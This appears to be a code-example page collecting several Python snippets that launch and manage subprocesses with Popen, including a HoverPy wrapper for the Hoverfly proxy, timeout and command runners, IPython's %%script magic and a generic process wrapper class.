                 simulation="",
                 synthesize=False,
                 metrics=False,
                 dev=False,
                 auth=False,
                 delays=[],
                 cert="",
                 certName="",
                 certOrg="",
                 dest=[],
                 verbose=False,
                 generateCACert=False,
                 destination="",
                 key="",
                 tlsVerification=True,
                 httpsToHttp=False,
                 recordMode=None,
                 showCmd=False,
                 spy=False):
        self._proxyPort = proxyPort
        self._adminPort = adminPort
        self._host = host
        self._modify = modify
        self._middleware = middleware
        self._flags = []
        self._capture = capture
        self._dbpath = dbpath
        self._db = db
        self._simulation = simulation
        self._synthesize = synthesize
        self._verbose = verbose
        self._session = requests.Session()
        self._session.trust_env = False
        self._metrics = metrics
        self._dev = dev
        self._auth = auth
        self._delays = delays
        self._cert = cert
        self._certName = certName
        self._certOrg = certOrg
        self._dest = dest
        self._generateCACert = generateCACert
        self._destination = destination
        self._key = key
        self._tlsVerification = tlsVerification
        self._httpsToHttp = httpsToHttp
        self._recordMode = recordMode
        self._showCmd = showCmd
        self._spy = spy
        self.__enableProxy()

        if self._recordMode == "once":
            self._capture = not os.path.isfile(self._dbpath)

        self.__start()

        if self._delays:
            self.__addDelaysFromParam()

    def wipe(self):
        """
        Wipe the bolt database.

        Calling this after HoverPy has been instantiated is
        potentially dangerous. This function is mostly used
        internally for unit tests.
        """
        try:
            if os.path.isfile(self._dbpath):
                os.remove(self._dbpath)
        except OSError:
            pass

    def capture(self):
        """
        Switches hoverfly to capture mode.
        """
        return self.mode("capture")

    def simulate(self):
        """
        Switches hoverfly to simulate mode.

        Please note simulate is the default mode.
        """
        return self.mode("simulate")

    def spy(self):
        """
        Switches hoverfly to spy mode.
        """
        return self.mode("spy")

    def config(self):
        """
        Returns the hoverfly configuration json.
        """
        return self._session.get(self.__v2() + "/hoverfly").json()

    def simulation(self, data=None):
        """
        Gets / Sets the simulation data.

        If no data is passed in, then this method acts as a getter.
        if data is passed in, then this method acts as a setter.

        Keyword arguments:
        data -- the simulation data you wish to set (default None)
        """
        if data:
            return self._session.put(self.__v2() + "/simulation", data=data)
        else:
            return self._session.get(self.__v2() + "/simulation").json()

    def destination(self, name=""):
        """
        Gets / Sets the destination data.
        """
        if name:
            return self._session.put(self.__v2() + "/hoverfly/destination",
                                     data={
                                         "destination": name
                                     }).json()
        else:
            return self._session.get(self.__v2() +
                                     "/hoverfly/destination").json()

    def middleware(self):
        """
        Gets the middleware data.
        """
        return self._session.get(self.__v2() + "/hoverfly/middleware").json()

    def mode(self, mode=None):
        """
        Gets / Sets the mode.

        If no mode is provided, then this method acts as a getter.

        Keyword arguments:
        mode -- this should either be 'capture' or 'simulate' (default None)
        """
        if mode:
            logging.debug("SWITCHING TO %s" % mode)
            url = self.__v2() + "/hoverfly/mode"
            logging.debug(url)
            return self._session.put(url,
                                     data=json.dumps({"mode":
                                                      mode})).json()["mode"]
        else:
            return self._session.get(self.__v2() +
                                     "/hoverfly/mode").json()["mode"]

    def usage(self):
        """
        Gets the usage data.
        """
        return self._session.get(self.__v2() + "/hoverfly/usage").json()

    def metadata(self, delete=False):
        """
        Gets the metadata.
        """
        if delete:
            return self._session.delete(self.__v1() + "/metadata").json()
        else:
            return self._session.get(self.__v1() + "/metadata").json()

    def records(self, data=None):
        """
        Gets / Sets records.
        """
        if data:
            return self._session.post(self.__v1() + "/records",
                                      data=data).json()
        else:
            return self._session.get(self.__v1() + "/records").json()

    def delays(self, delays=[]):
        """
        Gets / Sets the delays. 
        """
        if delays:
            return self._session.put(self.__v1() + "/delays",
                                     data=json.dumps(delays)).json()
        else:
            return self._session.get(self.__v1() + "/delays").json()

    def addDelay(self, urlPattern="", delay=0, httpMethod=None):
        """
        Adds delays. 
        """
        print("addDelay is deprecated please use delays instead")
        delay = {"urlPattern": urlPattern, "delay": delay}
        if httpMethod:
            delay["httpMethod"] = httpMethod
        return self.delays(delays={"data": [delay]})

    def httpProxy(self):
        return "http://%s:%i" % (self._host, self._proxyPort)

    def httpsProxy(self):
        if self._httpsToHttp:
            return self.httpProxy()
        else:
            return "https://%s:%i" % (self._host, self._proxyPort)

    def __del__(self):
        if self._process:
            self.__stop()

    def __exit__(self, exc_type, exc_val, exc_tb):
        if self._process:
            self.__stop()

    def __enter__(self):
        return self

    def __host(self):
        """
        Returns the URL to the admin interface / APIs.
        """
        return "http://%s:%i" % (self._host, self._adminPort)

    def __v1(self):
        """
        Return the URL to the v1 API
        """
        return self.__host() + "/api"

    def __v2(self):
        """
        Return the URL to the v2 API
        """
        return self.__host() + "/api/v2"

    def __enableProxy(self):
        """
        Set the required environment variables to enable the use of hoverfly as a proxy.
        """
        os.environ["HTTP_PROXY"] = self.httpProxy()
        os.environ["HTTPS_PROXY"] = self.httpsProxy()

        os.environ["REQUESTS_CA_BUNDLE"] = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), "cert.pem")

    def __disableProxy(self):
        """
        Clear the environment variables required to enable the use of hoverfly as a proxy.
        """
        del os.environ['HTTP_PROXY']
        del os.environ['HTTPS_PROXY']
        del os.environ['REQUESTS_CA_BUNDLE']

    def __writepid(self, pid):
        """
        HoverFly fails to launch if it's already running on
        the same ports, so we keep track of running instances via
        temp files named after the proxy and admin ports, each
        containing the process's PID.
        """
        import tempfile
        d = tempfile.gettempdir()
        name = os.path.join(
            d, "hoverpy.%i.%i" % (self._proxyPort, self._adminPort))
        with open(name, 'w') as f:
            f.write(str(pid))
            logging.debug("writing to %s" % name)

    def __rmpid(self):
        """
        Remove the PID file on shutdown. Unfortunately this may
        not get called if the process isn't given time to shut
        down.
        """
        import tempfile
        d = tempfile.gettempdir()
        name = os.path.join(
            d, "hoverpy.%i.%i" % (self._proxyPort, self._adminPort))
        if os.path.exists(name):
            os.unlink(name)
            logging.debug("deleting %s" % name)

    def __kill_if_not_shut_properly(self):
        """
        If the HoverFly process on the given ports did not shut
        down correctly, kill the recorded PID before launching a
        new instance.
        todo: this will kill existing HoverFly processes
        on those ports indiscriminately
        """
        import tempfile
        d = tempfile.gettempdir()
        name = os.path.join(
            d, "hoverpy.%i.%i" % (self._proxyPort, self._adminPort))
        if os.path.exists(name):
            logging.debug("pid file exists.. killing it")
            f = open(name, "r")
            pid = int(f.read())
            try:
                import signal
                os.kill(pid, signal.SIGTERM)
                logging.debug("killing %i" % pid)
            except:
                logging.debug("nothing to clean up")
                pass
            finally:
                os.unlink(name)

    def __start(self):
        """
        Start the hoverfly process.

        This function waits until it can make contact
        with the hoverfly API before returning.
        """
        logging.debug("starting %i" % id(self))
        self.__kill_if_not_shut_properly()
        self.FNULL = open(os.devnull, 'w')
        flags = self.__flags()
        cmd = [hoverfly] + flags
        if self._showCmd:
            print(cmd)
        self._process = Popen(
            [hoverfly] + flags,
            #stdin=self.FNULL,
            #stdout=self.FNULL,
            stderr=subprocess.STDOUT)
        start = time.time()
        while time.time() - start < 1:
            try:
                url = "http://%s:%i/api/health" % (self._host, self._adminPort)
                r = self._session.get(url)
                j = r.json()
                up = "message" in j and "healthy" in j["message"]
                if up:
                    logging.debug("has pid %i" % self._process.pid)
                    self.__writepid(self._process.pid)
                    return self._process
                else:
                    time.sleep(1 / 100.0)
            except:
                # import traceback
                # traceback.print_exc()
                # wait 10 ms before trying again
                time.sleep(1 / 100.0)
                pass

        logging.error("Could not start hoverfly!")
        raise ValueError("Could not start hoverfly!")

    def __stop(self):
        """
        Stop the hoverfly process.
        """
        if logging:  # the logging module may already be gone at interpreter shutdown
            logging.debug("stopping")
        self._process.terminate()
        # communicate means we wait until the process
        # was actually terminated, this removes some
        # warnings in python3
        self._process.communicate()
        self._process = None
        self.FNULL.close()
        self.FNULL = None
        self.__disableProxy()
        # del self._session
        # self._session = None
        self.__rmpid()

    def __flags(self):
        """
        Internal method. Turns arguments into flags.
        """
        flags = []
        if self._capture:
            flags.append("-capture")
        if self._spy:
            flags.append("-spy")
        if self._dbpath:
            flags += ["-db-path", self._dbpath]
            flags += ["-db", "boltdb"]
        else:
            flags += ["-db", "memory"]
        if self._synthesize:
            assert (self._middleware)
            flags += ["-synthesize"]
        if self._simulation:
            flags += ["-import", self._simulation]
        if self._proxyPort:
            flags += ["-pp", str(self._proxyPort)]
        if self._adminPort:
            flags += ["-ap", str(self._adminPort)]
        if self._modify:
            flags += ["-modify"]
        if self._verbose:
            flags += ["-v"]
        if self._dev:
            flags += ["-dev"]
        if self._metrics:
            flags += ["-metrics"]
        if self._auth:
            flags += ["-auth"]
        if self._middleware:
            flags += ["-middleware", self._middleware]
        if self._cert:
            flags += ["-cert", self._cert]
        if self._certName:
            flags += ["-cert-name", self._certName]
        if self._certOrg:
            flags += ["-cert-org", self._certOrg]
        if self._destination:
            flags += ["-destination", self._destination]
        if self._key:
            flags += ["-key", self._key]
        if self._dest:
            for i in range(len(self._dest)):
                flags += ["-dest", self._dest[i]]
        if self._generateCACert:
            flags += ["-generate-ca-cert"]
        if not self._tlsVerification:
            flags += ["-tls-verification", "false"]

        logging.debug("flags:" + str(flags))
        return flags

    def __addDelaysFromParam(self):
        delaysDoc = []
        for delays in self._delays:
            delay = {"urlPattern": delays[0], "delay": delays[1]}
            if len(delays) == 3:
                delay["httpMethod"] = delays[2]
            delaysDoc.append(delay)
        return self.delays(delays={"data": delaysDoc})
Example #55
0
class TimeoutProcess(object):
    '''Runs an external command until timeout is reached

    Assumes that Popen uses PIPE for stdin, stdout and stderr
    Data for stdin may be supplied on instantiation, stdout and
    stderr will be returned from the call.'''
    def __init__(self):
        self.argv = None
        self.timeout = None
        self.stdin = None
        self.stdout = ''
        self.stderr = ''
        self.p = None
        self.t = None
        self.returncode = -127

    def __call__(self, argv, timeout, stdin=None, **kwargs):
        '''Run external command argv until timeout is reached

        If stdin is not None the data will be supplied to the
        process's stdin.
        Remaining kwargs will be passed to Popen.
        stderr and stdout are always strings; returncode is -1
        if a timeout occurred'''

        self.argv = argv
        self.timeout = timeout
        self.stdin = stdin

        def target():
            self.p = Popen(self.argv,
                           stdin=PIPE,
                           stdout=PIPE,
                           stderr=PIPE,
                           **kwargs)
            (self.stdout, self.stderr) = self.p.communicate(self.stdin)
            self.returncode = self.p.returncode

        self.t = Thread(target=target)
        self.t.start()
        self.t.join(self.timeout)

        if self.t.is_alive():
            # In strange cases, there is no subprocess...
            if self.p:
                log.debug("Terminating process %r in thread %r", self.p.pid,
                          self.t.name)
                try:
                    self.p.terminate()
                except OSError as e:  # pragma: no cover
                    if e.args[0] != errno.ESRCH:
                        raise
                self.t.join(THREADKILLTIMEOUT)
                if self.t.is_alive():
                    log.debug("Killing process %r in thread %r", self.p.pid,
                              self.t.name)
                    try:
                        self.p.kill()
                    except OSError as e:  # pragma: no cover
                        if e.args[0] != errno.ESRCH:
                            raise
                    if self.t.is_alive():
                        log.warning("Process %r in thread %r still won't die...",
                                    self.p and self.p.pid or None,
                                    self.t and self.t.name or None)
                self.stderr += '\nTimeout occurred\n'
                self.returncode = -1
            else:  # pragma: no cover
                log.warning('No subprocess found :-/')
                self.stderr += '\nAn error occurred\n'
                self.returncode = -1

        return process(self.returncode, self.stdout, self.stderr)
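
A usage sketch for the class above. The `process` result type on the last line of __call__ is not shown in this excerpt; treating it as a namedtuple with a returncode field is an assumption.

run = TimeoutProcess()
result = run(['sleep', '60'], timeout=2)
assert result.returncode == -1    # -1 signals a timeout, per the docstring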
Example #56
0
    def run(self, data, store, signal, context, **kwargs):
        """ The main run method of the Python task.

        Args:
            data (MultiTaskData): The data object that has been passed from the
                                  predecessor task.
            store (DataStoreDocument): The persistent data store object that allows the
                                       task to store data for access across the current
                                       workflow run.
            signal (TaskSignal): The signal object for tasks. It wraps the construction
                                 and sending of signals into easy to use methods.
            context (TaskContext): The context in which the tasks runs.

        Returns:
            Action: An Action object containing the data that should be passed on
                    to the next task and optionally a list of successor tasks that
                    should be executed.
        """
        params = self.params.eval(data, store, exclude=['command'])

        capture_stdout = self._callback_stdout is not None or params.capture_stdout
        capture_stderr = self._callback_stderr is not None or params.capture_stderr

        stdout_file = TemporaryFile() if params.capture_stdout else None
        stderr_file = TemporaryFile() if params.capture_stderr else None

        stdout = PIPE if capture_stdout else None
        stderr = PIPE if capture_stderr else None

        # change the user or group under which the process should run
        if params.user is not None or params.group is not None:
            pre_exec = self._run_as(params.user, params.group)
        else:
            pre_exec = None

        # call the command
        proc = Popen(self.params.eval_single('command', data, store),
                     cwd=params.cwd,
                     shell=True,
                     env=params.env,
                     preexec_fn=pre_exec,
                     stdout=stdout,
                     stderr=stderr,
                     stdin=PIPE if params.stdin is not None else None)

        # if input is available, send it to the process
        if params.stdin is not None:
            proc.stdin.write(params.stdin.encode(sys.getfilesystemencoding()))

        # send a notification that the process has been started
        try:
            if self._callback_process is not None:
                self._callback_process(proc.pid, data, store, signal, context)
        except (StopTask, AbortWorkflow):
            proc.terminate()
            raise

        # send the output handling to a thread
        if capture_stdout or capture_stderr:
            output_reader = BashTaskOutputReader(proc, stdout_file,
                                                 stderr_file,
                                                 self._callback_stdout,
                                                 self._callback_stderr,
                                                 params.refresh_time, data,
                                                 store, signal, context)
            output_reader.start()
        else:
            output_reader = None

        # wait for the process to complete and watch for a stop signal
        while proc.poll() is None or\
                (output_reader is not None and output_reader.is_alive()):
            sleep(params.refresh_time)
            if signal.is_stopped:
                proc.terminate()

        if output_reader is not None:
            output_reader.join()
            data = output_reader.data

            # if a stop or abort exception was raised, stop the bash process and re-raise
            if output_reader.exc_obj is not None:
                if proc.poll() is None:
                    proc.terminate()
                raise output_reader.exc_obj

        # send a notification that the process has completed
        if self._callback_end is not None:
            if stdout_file is not None:
                stdout_file.seek(0)
            if stderr_file is not None:
                stderr_file.seek(0)

            self._callback_end(proc.returncode, stdout_file, stderr_file, data,
                               store, signal, context)

        if stdout_file is not None:
            stdout_file.close()

        if stderr_file is not None:
            stderr_file.close()

        return Action(data)
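
A self-contained sketch of the preexec_fn technique used above (the _run_as helper itself is not shown in the excerpt). Dropping privileges requires running as root, and the uid/gid values are placeholders.

import os
from subprocess import Popen

def demote(uid, gid):
    def set_ids():
        os.setgid(gid)   # drop the group first, while still privileged
        os.setuid(uid)
    return set_ids

proc = Popen("id", shell=True, preexec_fn=demote(1000, 1000))
proc.wait()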
Example #57
0
    def run_command(self, cmd, check_code=True):
        """ Run command sequence `cmd` returning exit code, stdout, stderr

        Parameters
        ----------
        cmd : str or sequence
            string with command name or sequence of strings defining command
        check_code : {True, False}, optional
            If True, raise error for non-zero return code

        Returns
        -------
        returncode : int
            return code from execution of `cmd`
        stdout : bytes (python 3) or str (python 2)
            stdout from `cmd`
        stderr : bytes (python 3) or str (python 2)
            stderr from `cmd`
        """
        if isinstance(cmd, string_types):
            cmd = [cmd]
        else:
            cmd = list(cmd)
        if self.local_script_dir is not None:
            # Windows can't run script files without extensions
            # natively so we need to run local scripts (no extensions)
            # via the Python interpreter.  On Unix, we might have the
            # wrong incantation for the Python interpreter
            # in the hash bang first line in the source file. So, either way,
            # run the script through the Python interpreter
            cmd = [sys.executable,
                   pjoin(self.local_script_dir, cmd[0])] + cmd[1:]
        elif os.name == 'nt':
            # Need .bat file extension for windows
            cmd[0] += '.bat'
        if os.name == 'nt':
            # Quote any arguments with spaces. The quotes delimit the arguments
            # on Windows, and the arguments might be files paths with spaces.
            # On Unix the list elements are each separate arguments.
            cmd = ['"{0}"'.format(c) if ' ' in c else c for c in cmd]
        if self.debug_print:
            print("Running command '%s'" % cmd)
        env = os.environ
        if self.local_module_dir is not None:
            # module likely comes from the current working directory.
            # We might need that directory on the path if we're running
            # the scripts from a temporary directory
            env = env.copy()
            pypath = env.get('PYTHONPATH', None)
            if pypath is None:
                env['PYTHONPATH'] = self.local_module_dir
            else:
                env['PYTHONPATH'] = self.local_module_dir + pathsep + pypath
        proc = Popen(cmd, stdout=PIPE, stderr=PIPE, env=env)
        stdout, stderr = proc.communicate()
        if proc.poll() is None:
            proc.terminate()
        if check_code and proc.returncode != 0:
            raise RuntimeError(
                """Command "{0}" failed with
                stdout
                ------
                {1}
                stderr
                ------
                {2}
                """.format(cmd, stdout, stderr))
        opp = self.output_processor
        return proc.returncode, opp(stdout), opp(stderr)
Example #58
0
def run_command(runtime, output=None, timeout=0.01):
    """Run a command, read stdout and stderr, prefix with timestamp.

    The returned runtime contains a merged stdout+stderr log with timestamps
    """

    # Init variables
    cmdline = runtime.cmdline
    env = canonicalize_env(runtime.environ)

    errfile = None
    outfile = None
    stdout = PIPE
    stderr = PIPE

    if output == "file":
        outfile = os.path.join(runtime.cwd, "output.nipype")
        stdout = open(outfile, "wb")  # t=='text'===default
        stderr = STDOUT
    elif output == "file_split":
        outfile = os.path.join(runtime.cwd, "stdout.nipype")
        stdout = open(outfile, "wb")
        errfile = os.path.join(runtime.cwd, "stderr.nipype")
        stderr = open(errfile, "wb")
    elif output == "file_stdout":
        outfile = os.path.join(runtime.cwd, "stdout.nipype")
        stdout = open(outfile, "wb")
    elif output == "file_stderr":
        errfile = os.path.join(runtime.cwd, "stderr.nipype")
        stderr = open(errfile, "wb")

    proc = Popen(
        cmdline,
        stdout=stdout,
        stderr=stderr,
        shell=True,
        cwd=runtime.cwd,
        env=env,
        close_fds=(not sys.platform.startswith("win")),
    )

    result = {
        "stdout": [],
        "stderr": [],
        "merged": [],
    }

    if output == "stream":
        streams = [
            Stream("stdout", proc.stdout),
            Stream("stderr", proc.stderr)
        ]

        def _process(drain=0):
            try:
                res = select.select(streams, [], [], timeout)
            except select.error as e:
                iflogger.info(e)
                if e.args[0] == errno.EINTR:
                    return
                else:
                    raise
            else:
                for stream in res[0]:
                    stream.read(drain)

        while proc.returncode is None:
            proc.poll()
            _process()

        _process(drain=1)

        # collect results, merge and return
        result = {}
        temp = []
        for stream in streams:
            rows = stream._rows
            temp += rows
            result[stream._name] = [r[2] for r in rows]
        temp.sort()
        result["merged"] = [r[1] for r in temp]

    if output.startswith("file"):
        proc.wait()
        if outfile is not None:
            stdout.flush()
            stdout.close()
            with open(outfile, "rb") as ofh:
                stdoutstr = ofh.read()
            result["stdout"] = read_stream(stdoutstr, logger=iflogger)
            del stdoutstr

        if errfile is not None:
            stderr.flush()
            stderr.close()
            with open(errfile, "rb") as efh:
                stderrstr = efh.read()
            result["stderr"] = read_stream(stderrstr, logger=iflogger)
            del stderrstr

        if output == "file":
            result["merged"] = result["stdout"]
            result["stdout"] = []
    else:
        stdout, stderr = proc.communicate()
        if output == "allatonce":  # Discard stdout and stderr otherwise
            result["stdout"] = read_stream(stdout, logger=iflogger)
            result["stderr"] = read_stream(stderr, logger=iflogger)

    runtime.returncode = proc.returncode
    try:
        proc.terminate()  # Ensure we are done
    except OSError as error:
        # Python 2 raises when the process is already gone
        if error.errno != errno.ESRCH:
            raise

    # Dereference & force GC for a cleanup
    del proc
    del stdout
    del stderr
    gc.collect()

    runtime.stderr = "\n".join(result["stderr"])
    runtime.stdout = "\n".join(result["stdout"])
    runtime.merged = "\n".join(result["merged"])
    return runtime
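
A self-contained sketch of the select-based polling idea above, without nipype's Stream helper: watch both pipes, tag each line with its source, and stop once both hit EOF (POSIX only; select on pipe objects is not supported on Windows).

import select
from subprocess import Popen, PIPE

proc = Popen("echo out; echo err 1>&2", shell=True,
             stdout=PIPE, stderr=PIPE)
streams = {proc.stdout: "stdout", proc.stderr: "stderr"}
collected = []
while streams:
    ready, _, _ = select.select(list(streams), [], [], 0.1)
    for pipe in ready:
        line = pipe.readline()
        if not line:                  # EOF on this pipe
            del streams[pipe]
            continue
        collected.append((streams[pipe], line.decode().rstrip()))
proc.wait()
print(collected)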
Example #59
0
File: script.py Project: zoeang/ipython
    def shebang(self, line, cell):
        """Run a cell via a shell command
        
        The `%%script` line is like the #! line of script,
        specifying a program (bash, perl, ruby, etc.) with which to run.
        
        The rest of the cell is run by that program.
        
        Examples
        --------
        ::
        
            In [1]: %%script bash
               ...: for i in 1 2 3; do
               ...:   echo $i
               ...: done
            1
            2
            3
        """
        argv = arg_split(line, posix=not sys.platform.startswith('win'))
        args, cmd = self.shebang.parser.parse_known_args(argv)

        try:
            p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
        except OSError as e:
            if e.errno == errno.ENOENT:
                print("Couldn't find program: %r" % cmd[0])
                return
            else:
                raise

        if not cell.endswith('\n'):
            cell += '\n'
        cell = cell.encode('utf8', 'replace')
        if args.bg:
            self.bg_processes.append(p)
            self._gc_bg_processes()
            to_close = []
            if args.out:
                self.shell.user_ns[args.out] = p.stdout
            else:
                to_close.append(p.stdout)
            if args.err:
                self.shell.user_ns[args.err] = p.stderr
            else:
                to_close.append(p.stderr)
            self.job_manager.new(self._run_script,
                                 p,
                                 cell,
                                 to_close,
                                 daemon=True)
            if args.proc:
                self.shell.user_ns[args.proc] = p
            return

        try:
            out, err = p.communicate(cell)
        except KeyboardInterrupt:
            try:
                p.send_signal(signal.SIGINT)
                time.sleep(0.1)
                if p.poll() is not None:
                    print("Process is interrupted.")
                    return
                p.terminate()
                time.sleep(0.1)
                if p.poll() is not None:
                    print("Process is terminated.")
                    return
                p.kill()
                print("Process is killed.")
            except OSError:
                pass
            except Exception as e:
                print("Error while terminating subprocess (pid=%i): %s" \
                    % (p.pid, e))
            return
        out = py3compat.decode(out)
        err = py3compat.decode(err)
        if args.out:
            self.shell.user_ns[args.out] = out
        else:
            sys.stdout.write(out)
            sys.stdout.flush()
        if args.err:
            self.shell.user_ns[args.err] = err
        else:
            sys.stderr.write(err)
            sys.stderr.flush()
        if args.raise_error and p.returncode != 0:
            raise CalledProcessError(p.returncode,
                                     cell,
                                     output=out,
                                     stderr=err)
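
A self-contained sketch of the escalation ladder used in the KeyboardInterrupt handler above: SIGINT first, then SIGTERM, then SIGKILL, polling briefly between steps (POSIX; the sleep command is a stand-in).

import signal
import time
from subprocess import Popen

def stop_gracefully(p, pause=0.1):
    for send in (lambda: p.send_signal(signal.SIGINT),
                 p.terminate,     # SIGTERM
                 p.kill):         # SIGKILL
        send()
        time.sleep(pause)
        if p.poll() is not None:
            return p.returncode
    return p.wait()

proc = Popen(["sleep", "60"])
print(stop_gracefully(proc))      # typically -2: killed by SIGINT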
Example #60
0
class Process(object):
    ''' Represents a running/ran process '''

    @staticmethod
    def devnull():
        ''' Helper method for opening devnull '''
        return open('/dev/null', 'w')

    @staticmethod
    def call(command, cwd=None, shell=False):
        '''
            Calls a command (either string or list of args).
            Returns tuple:
                (stdout, stderr)
        '''
        if type(command) is not str or ' ' in command or shell:
            shell = True
            if Configuration.verbose > 1:
                Color.pe('\n {C}[?] {W} Executing (Shell): {B}%s{W}' % command)
        else:
            shell = False
            if Configuration.verbose > 1:
                Color.pe('\n {C}[?]{W} Executing: {B}%s{W}' % command)

        pid = Popen(command, cwd=cwd, stdout=PIPE, stderr=PIPE, shell=shell)
        pid.wait()
        (stdout, stderr) = pid.communicate()

        # Python 3 compatibility
        if type(stdout) is bytes:
            stdout = stdout.decode('utf-8')
        if type(stderr) is bytes:
            stderr = stderr.decode('utf-8')

        if Configuration.verbose > 1 and stdout is not None and stdout.strip() != '':
            Color.pe('{P} [stdout] %s{W}' %
                     '\n [stdout] '.join(stdout.strip().split('\n')))
        if Configuration.verbose > 1 and stderr is not None and stderr.strip() != '':
            Color.pe('{P} [stderr] %s{W}' %
                     '\n [stderr] '.join(stderr.strip().split('\n')))

        return (stdout, stderr)

    @staticmethod
    def exists(program):
        ''' Checks if program is installed on this system '''
        p = Process(['which', program])
        stdout = p.stdout().strip()
        stderr = p.stderr().strip()

        if stdout == '' and stderr == '':
            return False

        return True

    def __init__(self, command, devnull=False, stdout=PIPE, stderr=PIPE, cwd=None, bufsize=0, stdin=PIPE):
        ''' Starts executing command '''

        if type(command) is str:
            # Commands have to be a list
            command = command.split(' ')

        self.command = command

        if Configuration.verbose > 1:
            Color.pe('\n {C}[?] {W} Executing: {B}%s{W}' % ' '.join(command))

        self.out = None
        self.err = None
        if devnull:
            sout = Process.devnull()
            serr = Process.devnull()
        else:
            sout = stdout
            serr = stderr

        self.start_time = time.time()

        self.pid = Popen(command, stdout=sout, stderr=serr,
                         stdin=stdin, cwd=cwd, bufsize=bufsize)

    def __del__(self):
        '''
            Ran when object is GC'd.
            If process is still running at this point, it should die.
        '''
        try:
            if self.pid and self.pid.poll() is None:
                self.interrupt()
        except AttributeError:
            pass

    def stdout(self):
        ''' Waits for process to finish, returns stdout output '''
        self.get_output()
        if Configuration.verbose > 1 and self.out is not None and self.out.strip() != '':
            Color.pe('{P} [stdout] %s{W}' %
                     '\n [stdout] '.join(self.out.strip().split('\n')))
        return self.out

    def stderr(self):
        ''' Waits for process to finish, returns stderr output '''
        self.get_output()
        if Configuration.verbose > 1 and self.err is not None and self.err.strip() != '':
            Color.pe('{P} [stderr] %s{W}' %
                     '\n [stderr] '.join(self.err.strip().split('\n')))
        return self.err

    def stdoutln(self):
        return self.pid.stdout.readline()

    def stderrln(self):
        return self.pid.stderr.readline()

    def stdin(self, text):
        if self.pid.stdin:
            self.pid.stdin.write(text.encode('utf-8'))
            self.pid.stdin.flush()

    def get_output(self):
        ''' Waits for process to finish, sets stdout & stderr '''
        if self.pid.poll() is None:
            self.pid.wait()
        if self.out is None:
            (self.out, self.err) = self.pid.communicate()

        if type(self.out) is bytes:
            self.out = self.out.decode('utf-8')

        if type(self.err) is bytes:
            self.err = self.err.decode('utf-8')

        return (self.out, self.err)

    def poll(self):
        ''' Returns exit code if process is dead, otherwise 'None' '''
        return self.pid.poll()

    def wait(self):
        self.pid.wait()

    def running_time(self):
        ''' Returns number of seconds since process was started '''
        return int(time.time() - self.start_time)

    def interrupt(self, wait_time=2.0):
        '''
            Send interrupt to current process.
            If process fails to exit within `wait_time` seconds, terminates it.
        '''
        try:
            pid = self.pid.pid
            cmd = self.command
            if type(cmd) is list:
                cmd = ' '.join(cmd)

            if Configuration.verbose > 1:
                Color.pe(
                    '\n {C}[?] {W} sending interrupt to PID %d (%s)' % (pid, cmd))

            os.kill(pid, signal.SIGINT)

            start_time = time.time()  # Time since Interrupt was sent
            while self.pid.poll() is None:
                # Process is still running
                time.sleep(0.1)
                if time.time() - start_time > wait_time:
                    # We waited too long for process to die, terminate it.
                    if Configuration.verbose > 1:
                        Color.pe(
                            '\n {C}[?] {W} Waited > %0.2f seconds for process to die, killing it' % wait_time)
                    os.kill(pid, signal.SIGTERM)
                    self.pid.terminate()
                    break

        except OSError as e:
            if 'No such process' in e.__str__():
                return
            raise e  # process cannot be killed
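
A usage sketch for the wrapper above; it assumes the surrounding tool has set up the Configuration class that the constructor and output methods consult.

p = Process(['ping', '-c', '3', '127.0.0.1'])
print(p.stdout())                  # waits for exit, returns decoded stdout
print('ran for', p.running_time(), 'seconds')
if p.poll() is None:               # still running? SIGINT, then SIGTERM
    p.interrupt(wait_time=2.0)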